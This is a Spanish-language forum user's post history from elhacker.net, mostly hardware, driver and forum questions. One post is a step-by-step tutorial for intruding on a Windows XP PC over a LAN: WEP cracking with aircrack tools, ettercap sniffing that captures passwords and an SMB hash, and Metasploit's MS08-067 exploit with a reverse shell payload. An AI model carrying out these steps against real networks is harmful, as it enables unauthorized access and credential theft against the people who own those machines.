elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


  Mostrar Temas
Páginas: [1] 2
1  Informática / Hardware / Memoria RAM extra para Acer One 150 en: 17 Julio 2010, 16:59 pm
Buenas amigos.

tengo una duda imperiosa y por mas que busco, me confunde mas.. y me gustaría que me ayudaran a solucionar algunas dudas concretas.


1.- En un Bus de Memoria ram DDR2 de 533Mhz, puedo meterle una memoria de 667Mhz o de 800Mhz?

2.-tengo 2 buses de 533Mhz, puedo tener una memoria de 533Mhz y una de 667 juntas en la misma placa??

3.-puedo tener 1gb + 512Mb de ram?

4.-hay algun problema si un slot está soldado a la placa...??  es decir, que aunque le quite los modulos, aun sigue teniendo 512 en ram.. tengo 2 slot y uno tiene un modulo soldado  a la placa.

gracias por su ayuda

2  Seguridad Informática / Materiales y equipos / TP-Link WN322G Review en: 7 Mayo 2010, 21:31 pm
Me he comprado una TP-Link WN322G por US $22 ....



Primero pensé que una un EPIC FAIL.. por ser atheros + USB.. pero luego vi que era un EPIC WIN porque es Zydas + USB

y me arrojó los siguientes resultados:



Es impresionante la velocidad de Inyección de la tarjeta de red... 198 datas/seg y de alli no bajó..

La usé en Ubuntu 10.04, me la reconoció al instante.. como wlan1..

Lo unico malo es que se calentó bastante... casi al punto de que no podia sostenerla por el USB metálico..

Saludos

3  Sistemas Operativos / GNU/Linux / Instalar Madwifi en Ubuntu 10.04 [SOlucionado] en: 2 Mayo 2010, 16:10 pm
ola amigos.. tengo un pequeño problema cuando intento instalar madwifi....

es que los drivers de ath5k no van con el aircrack y no pillo ningun paquete...  y me gustaria probar madwifi...


baje los drivers de madwifi-hal.. y los instalé con el sudo make y eso...  puse los de ath5k en la blacklist, /etc/modprobe.d/blacklist.conf  y ademas quité los de madwifi de la otra blacklist /etc/modprobe.d/blacklist-ath_pci.conf... pero no funciona...  se siguen cargando como modulo de kernel..


lo que quiero hacer es quitar los de ath5k e instalar los de madwifi.. ya intenté con modprobe -r ath5k  pero nada..

aqui está lspci -k

Código:
00:00.0 Host bridge: Intel Corporation Mobile 945GME Express Memory Controller Hub (rev 03)
Kernel driver in use: agpgart-intel
Kernel modules: intel-agp
00:02.0 VGA compatible controller: Intel Corporation Mobile 945GME Express Integrated Graphics Controller (rev 03)
Kernel driver in use: i915
Kernel modules: i915
00:02.1 Display controller: Intel Corporation Mobile 945GM/GMS/GME, 943/940GML Express Integrated Graphics Controller (rev 03)
00:1b.0 Audio device: Intel Corporation N10/ICH 7 Family High Definition Audio Controller (rev 02)
Kernel driver in use: HDA Intel
Kernel modules: snd-hda-intel
00:1c.0 PCI bridge: Intel Corporation N10/ICH 7 Family PCI Express Port 1 (rev 02)
Kernel driver in use: pcieport
Kernel modules: shpchp
00:1c.1 PCI bridge: Intel Corporation N10/ICH 7 Family PCI Express Port 2 (rev 02)
Kernel driver in use: pcieport
Kernel modules: shpchp
00:1c.2 PCI bridge: Intel Corporation N10/ICH 7 Family PCI Express Port 3 (rev 02)
Kernel driver in use: pcieport
Kernel modules: shpchp
00:1c.3 PCI bridge: Intel Corporation N10/ICH 7 Family PCI Express Port 4 (rev 02)
Kernel driver in use: pcieport
Kernel modules: shpchp
00:1d.0 USB Controller: Intel Corporation N10/ICH7 Family USB UHCI Controller #1 (rev 02)
Kernel driver in use: uhci_hcd
00:1d.1 USB Controller: Intel Corporation N10/ICH 7 Family USB UHCI Controller #2 (rev 02)
Kernel driver in use: uhci_hcd
00:1d.2 USB Controller: Intel Corporation N10/ICH 7 Family USB UHCI Controller #3 (rev 02)
Kernel driver in use: uhci_hcd
00:1d.3 USB Controller: Intel Corporation N10/ICH 7 Family USB UHCI Controller #4 (rev 02)
Kernel driver in use: uhci_hcd
00:1d.7 USB Controller: Intel Corporation N10/ICH 7 Family USB2 EHCI Controller (rev 02)
Kernel driver in use: ehci_hcd
00:1e.0 PCI bridge: Intel Corporation 82801 Mobile PCI Bridge (rev e2)
00:1f.0 ISA bridge: Intel Corporation 82801GBM (ICH7-M) LPC Interface Bridge (rev 02)
Kernel modules: iTCO_wdt, intel-rng
00:1f.2 IDE interface: Intel Corporation 82801GBM/GHM (ICH7 Family) SATA IDE Controller (rev 02)
Kernel driver in use: ata_piix
00:1f.3 SMBus: Intel Corporation N10/ICH 7 Family SMBus Controller (rev 02)
Kernel modules: i2c-i801
02:00.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL8101E/RTL8102E PCI Express Fast Ethernet controller (rev 02)
Kernel driver in use: r8169
Kernel modules: r8169
03:00.0 Ethernet controller: Atheros Communications Inc. AR5001 Wireless Network Adapter (rev 01)
Kernel driver in use: ath5k
Kernel modules: ath_pci, ath5k
jorge@acerone:~$ lspci -k
00:00.0 Host bridge: Intel Corporation Mobile 945GME Express Memory Controller Hub (rev 03)
Kernel driver in use: agpgart-intel
Kernel modules: intel-agp
00:02.0 VGA compatible controller: Intel Corporation Mobile 945GME Express Integrated Graphics Controller (rev 03)
Kernel driver in use: i915
Kernel modules: i915
00:02.1 Display controller: Intel Corporation Mobile 945GM/GMS/GME, 943/940GML Express Integrated Graphics Controller (rev 03)
00:1b.0 Audio device: Intel Corporation N10/ICH 7 Family High Definition Audio Controller (rev 02)
Kernel driver in use: HDA Intel
Kernel modules: snd-hda-intel
00:1c.0 PCI bridge: Intel Corporation N10/ICH 7 Family PCI Express Port 1 (rev 02)
Kernel driver in use: pcieport
Kernel modules: shpchp
00:1c.1 PCI bridge: Intel Corporation N10/ICH 7 Family PCI Express Port 2 (rev 02)
Kernel driver in use: pcieport
Kernel modules: shpchp
00:1c.2 PCI bridge: Intel Corporation N10/ICH 7 Family PCI Express Port 3 (rev 02)
Kernel driver in use: pcieport
Kernel modules: shpchp
00:1c.3 PCI bridge: Intel Corporation N10/ICH 7 Family PCI Express Port 4 (rev 02)
Kernel driver in use: pcieport
Kernel modules: shpchp
00:1d.0 USB Controller: Intel Corporation N10/ICH7 Family USB UHCI Controller #1 (rev 02)
Kernel driver in use: uhci_hcd
00:1d.1 USB Controller: Intel Corporation N10/ICH 7 Family USB UHCI Controller #2 (rev 02)
Kernel driver in use: uhci_hcd
00:1d.2 USB Controller: Intel Corporation N10/ICH 7 Family USB UHCI Controller #3 (rev 02)
Kernel driver in use: uhci_hcd
00:1d.3 USB Controller: Intel Corporation N10/ICH 7 Family USB UHCI Controller #4 (rev 02)
Kernel driver in use: uhci_hcd
00:1d.7 USB Controller: Intel Corporation N10/ICH 7 Family USB2 EHCI Controller (rev 02)
Kernel driver in use: ehci_hcd
00:1e.0 PCI bridge: Intel Corporation 82801 Mobile PCI Bridge (rev e2)
00:1f.0 ISA bridge: Intel Corporation 82801GBM (ICH7-M) LPC Interface Bridge (rev 02)
Kernel modules: iTCO_wdt, intel-rng
00:1f.2 IDE interface: Intel Corporation 82801GBM/GHM (ICH7 Family) SATA IDE Controller (rev 02)
Kernel driver in use: ata_piix
00:1f.3 SMBus: Intel Corporation N10/ICH 7 Family SMBus Controller (rev 02)
Kernel modules: i2c-i801
02:00.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL8101E/RTL8102E PCI Express Fast Ethernet controller (rev 02)
Kernel driver in use: r8169
Kernel modules: r8169
03:00.0 Ethernet controller: Atheros Communications Inc. AR5001 Wireless Network Adapter (rev 01)
Kernel driver in use: ath5k
Kernel modules: ath_pci, ath5k

quiero quitar los de ath5k y poner los de madwifi...

saludos y gracias
4  Seguridad Informática / Hacking / Tuto: Entrando a un PC en LAN en: 15 Diciembre 2009, 16:55 pm
Tutorial: Explotando vulnerabilidades en LAN con Metasploit


Inicio: Este tutorial ha sido hecho con el fin de poner en evidencia el descuido de los user al negarse a actualizar su Windows, si bien por ignorancia, o por que su windows no es original, ignorando que tras cada inocente numero se oculta un peligro mucho mas grande, el poder controlar su equipo remotamente, aprovechando una vulnerabilidad que pudo haber sido parcheada desde Windows Update o desde la web del fabricante del Software, tal es el caso de Adobe 8.1.1 que tiene mas vulnerabilidades que deberia tener un simple lector de pdf's.

Veamos el Equipo a utilizar:

Ubuntu Linux 9.04 (atacante) Atheros AR5007EG

Windows XP SP3 (victima) Realtek PCI Ethernet

Metasploit 3.5 Framework (Lo haremos a consola, me gusta mas)

CABE ACLARAR QUE NO BORRE LAS MAC PORQUE ES EQUIPO VIEJO, QUE USE DE PRUEBA, por eso no me moleste en borrarlas, ya que el router que use, solo lo conecte para eso,de igual manera el xp, solo lo instale para esto, asimismo las wifi y ethernet, son equipo sin uso, y sin importancia


paso 1: Planeando el Golpe:

para planear el golpe, necesitamos hacernos de herramientas utiles, confiables y soporte de hard bueno y eficiente, para que no nos deje tirados a medio camino, veamos nuestra lista de herramientas:

Metasploit:



ettercap 0.7.3 un viejo favorito de todos, la GUI es mas util para propositos de este manual



Acer Aspire One

1gb de ram
Intel Atom a 1.6 Ghz
Y la roba carteras Atheros AR5007EG


paso 2: Estudiando a la victima:

La victima es un user tipico, sin mucho que hacer en un sistema XP clasico, sin actualizar, por miedo a que la copia de Windows no es original, (claro que lo es, ya que venia con el sistema) pero igual, insisto en que actualize y el replica, diciendo que no es necesario... bueno...

Tiene algunos metroflogs, navega por Wi-Fi, messenger y tiene a cargo de la seguridad el peor vigilante,  ESET Smart Security v4 con fix y crack y demas tonterias.. menudo usuario.. ademas de no darse cuenta de que tiene algunas carpetas compartidas.. lo cual puede ser interesante... pero a la vez algo totalmente inutil, ya que no voy por sus archivos, sino a hacerme con el control total del sistema, no tengo ningun interes en joderle sus trabajos, ya que de seguro le ha costado esfuerzo hacerlo...


PAso 3: Infiltracion

Tiene una conexion de 1mb, ISP Megacable, con un clasico modem motorola poco eficiente, pero es suficiente para navegar en internet, ya que usa cifrado WEP, entremos a su wifi, GUARDANDO LOS PAQUETES en .cap, usando el comando:

Código:
sudo airodump-ng --write hack --channel X <interfaz>



luego procedemos a desencriptarlo

(son pocos porque no quiero pasar buen rato capturando tonterias)

Código:
sudo airdecap-ng -w wepkey hack-01.cap



ya despues de haber sacado la pass del WIFI procedemos a explorar:


Paso 4: Explorando tierras desconocidas:

Por Seguridad, recomiendo que se cambien la MAC del Dispositivo, con macchanger-gtk o a mano con ifconfig/iwconfig, despues de que tomamos la seguridad necesaria... exploremos un poco en el router/gateway/puerta de enlace, si es que conseguimos acceso a el...



rango de IP: 192.168.0.10-26
Gateway:     192.168.0.1
user/pass     por defecto
WIFI users    2/2  WIFI/Ethernet
Objetivo:     192.168.0.10
SO:           WinXP SP3
Hard          P4 3.0 Ghz, 1gb RAM Dell Presicion 9150

importantisimo el decir que la pass y el user por defecto, puedes pillarlos en internet... bastante sencillo, tambien cabe aclarar que no es obligatoriamente necesario ownear al gateway... nosotros vamos a por el objetivo, no por sus archivos o su conexion, sino por su PC

luego con ettercap-ng  vemos que ha pasado por su modem en el instante que le sniffabamos, (esto es necesario cuando no tenemos acceso al router, mas que nada para ver IPs de lan, en caso de DHCP deshabilitado, o para ver otros dispositivos de la LAN, impresoras, scanners, camaras de vigilancia, etc)

abrimos el hack-01-dec.cap, que es la captura ya descifrada y le damos a Start Sniffing, el programa hablara por si solo, si es que tiene algo que decir



WTF???

le hemos pillado las pass de los 3 metroflogs y un hash de un admin de smb, un servicio para compartir recursos en sistemas windows.. vaya que cosas pasan por los modems... es casi imposible creerlo, no me agrada lo que he sacado, me confunde el que haya un dominio, y el admin intentando loguearse, pero en fin, quizas...

1.-No es el usuario que pensamos, quiza es una trampa bien elaborada
2.-Es una mini red privada con muchos equipos entrando y saliendo
    (pero no es posible, ya que la DHCP table, no indica mas que 4 equipos, tal vez la DHCP table, no guarda logs, solo muestra equipos en tiempo real)

¬¬ hmmm....  da igual, entraremos a fuerza.. de eso es el hacking

resumiendo esta area, tienes 2 opciones de exploracion:

1.- Entras a la WIFI como puedas,
2.-Puedes entrar al router y ver los host o puedes scanear los host por medio de ettercap
3.-si tu objetivo se conecta por WIFI, tienes 2 opciones, MITM con ettercap o capturar con airodump-ng y luego desencriptarle con airdecap y analizarle con ettercap
4.-si tu objetivo es por Ethernet, solo te queda la opcion de MITM con ettercap..
5.-en ambos casos (wifi/ethernet) el MITM se realiza de la misma forma, e independientemente del SO



paso 5:Limpiando y cerrojando Metasploit

A grandes rasgos podria decir que Metasploit es un set de exploits ya compilados y ya listos para la accion, preparados para ejecutarse y poder quebrantar la debil seguridad de un sistema Windows

instalamos metasploit desde su archivo .run bajado desde su web.

y luego en la terminal ejecutamos

Código:
sudo msfconsole

esperamos a que carguen los exploits y veremos la interfaz de metasploit tan interesante como su poder oculto..



hagamos un recuento, Win XP, no actualizaciones + SMB + NOD32fix + user tipico = control total del PC

podemos usar varios tipos de exploits, SMB me agrada y tiene mucho para ver:

es cuestion de poner en MSF

Código:
show exploits

y saldra algo com esto:


Código:
windows/smb/ms06_066_nwapi                                     good       Microsoft Services MS06-066 nwapi32.dll
   windows/smb/ms03_049_netapi                                    good       Microsoft Workstation Service NetAddAlternateComputerName Overflow
   windows/smb/smb2_negotiate_func_index                          good       Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
   windows/smb/ms04_031_netdde                                    good       Microsoft NetDDE Service Overflow
   windows/smb/msdns_zonename                                     great      Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB)
   windows/smb/psexec                                             excellent  Microsoft Windows Authenticated User Code Execution
   windows/smb/ms04_011_lsass                                     great      Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow
   windows/smb/ms08_067_netapi                                    great      Microsoft Server Service Relative Path Stack Corruption
   windows/smb/netidentity_xtierrpcpipe                           great      Novell NetIdentity Agent XTIERRPCPIPE Named Pipe Buffer Overflow.
   windows/smb/ms06_025_rras                                      average    Microsoft RRAS Service Overflow
   windows/smb/ms05_039_pnp                                       good       Microsoft Plug and Play Service Overflow
   windows/smb/ms04_007_killbill                                  low        Microsoft ASN.1 Library Bitstring Heap Overflow
   windows/smb/ms06_066_nwwks                                     good       Microsoft Services MS06-066 nwwks.dll
   windows/smb/ms06_025_rasmans_reg                               good       Microsoft RRAS Service RASMAN Registry Overflow
   windows/smb/ms06_040_netapi                                    great      Microsoft Server Service NetpwPathCanonicalize Overflow
   windows/smb/smb_relay                                          excellent  Microsoft Windows SMB Relay Code Execution

hmmm cual elegire..?? elegire.. este!

windows/smb/ms08_067_netapi

refiere a una vulnerabilidad en SMB que permite ejecutar codigo remoto, muy interesante:

empecemos:

para seleccionar el exploit, ponemos en consola:

Código:
use windows/smb/ms08_067_netapi

y saldra asi:



despues, lo configuramos, poniendo:

Código:
show options

asi:




RHOST: Ip del objetivo en LAN
RPORT: puerto del servicio afectado
SMBPIPE: nombre para usar del SMB pipe

si queremos cambiar/poner alguno de estos parametros, ponemos:

Código:
set RHOST 192.168.0.10
Código:
set RPORT 445

o lo que necesitemos, no siempre son estos valores ni esta la config...

luego tendremos que seleccionar el codigo remoto que ejecutara despues de triggerear la vulnerabilidad, llamada payload

Código:
show payloads



y estas son las mas importantes,

windows/shell_reverse_tcp                        normal  Windows Command Shell, Reverse TCP Inline
generic/shell_bind_tcp                           normal  Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp                        normal  Generic Command Shell, Reverse TCP Inline
windows/shell/bind_tcp                           normal  Windows Command Shell, Bind TCP Stager

2 bind para conectarse directamente y 2 reverses para que la victima se conecte a ti..

despues de selecciona la payload hay que seleccionar sus opciones, yo seleccione la primera de la lista
Código:
show options



para luego poner las opciones de la payload con estos comandos, elegi la payload de reverse connection porque se me hace mas facil, la reverse connection

Código:
set LHOST <tu ip de lan>
Código:
set LPORT 445

una vez listos todos los comandos y colocadas todas las ip, procedemos al ataque, ejecutando en metasploit el comando "exploit"

2da parte:

Tierras desconocidas... en proceso

Errores y demas, aqui por favor

Un Saludo

5  Foros Generales / Sugerencias y dudas sobre el Foro / arreglen la plantilla quotefast en: 9 Septiembre 2009, 04:22 am
cuando respondo un tema.. quiero citar todo el texto de alguien, pero no puedo porque me dice que no puede cargar la plantilla quotefast..


6  Foros Generales / Sugerencias y dudas sobre el Foro / huevos de pascua en smf en: 11 Agosto 2009, 18:39 pm
ningun huevo de pascua funciona en smf aqui en el hacker...

alguien sabe algo?




Post/Message eggs:

"l33t" egg: When you have exactly 1337 posts, the "1337" is replaced with the word l33t.

"I am a geek!!" egg: When you have over 100,000 posts, your post count is replaced with the text "I am a geek!!".

"I am the administrator" egg: If you make a post with the exact words "i am the administrator" without quotes or other phrases, and if you're not in the admin group, you'll get an error screen with "Knave! Masquerader! Charlatan!" as the text.


?action eggs

The Book of Unknown:

Action:
?action=about:unknown;verse=xxx

Available sub-actions:
?action=about:unknown;verse=2:18
?action=about:unknown;verse=4:16 (default redirect)


Mozilla Redirect

Action:
?action=about:mozilla (redirects to mozilla homepage)


Destroy

Action:
?action=maintain;sa=destroy


BBcode eggs

"/me" egg: When you type "/me {$}" while {$} is a third-person action, you'll get "* {your name} {$}" while {your name} is your username and {s} is the text of the action you put.

"" or "kissy": Returns specific "/me" eggs.


Registration eggs

"Chocolate Cake" egg: On the registration screen, input a username that is already taken, and as a password put "chocolate cake" without the quotes. Upon confirming, you'll get the following message: "Sorry, I don't take bribes... you'll need to come up with a different name."
Logged
 :-*
7  Programación / Ingeniería Inversa / llave HASP Paralelo en: 3 Agosto 2009, 19:49 pm
buenas amigos...

es la primera vez que me paso por aqui..

solo para aclarar una duda acerca de HASP

tengo un programa que usa HASP pero en un puerto paralelo...

no hay ningun problema con ello...


pero.. como le puedo hacer para que mi HASP paralela pueda ser usada en una laptop con USB.. que no tiene paralelo??

saludos
8  Foros Generales / Sugerencias y dudas sobre el Foro / https no funciona en: 11 Julio 2009, 15:59 pm
9  Foros Generales / Sugerencias y dudas sobre el Foro / MP desde cierto numero de post en: 4 Mayo 2009, 05:59 am
nevegaba por el hacker.net  y veo que tengo un MP nuevo;   :o

es de un tio, un tal noseque1966

preguntandome "que si le podia ayudar a hackear una contraseña"


y le respondi


NO



mi sugerencia es que desde un determinado numero de post se puedan enviar MP como medida de seguridad
10  Foros Generales / Sugerencias y dudas sobre el Foro / WTF? reenviar codigo de Activacion en: 23 Abril 2009, 23:41 pm
observen....

estaba yo trabajando y de repente.... el foro me hizo un log off  y me dejo como visitante,   me loguee otra vez y aparecio esto:


Páginas: [1] 2
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines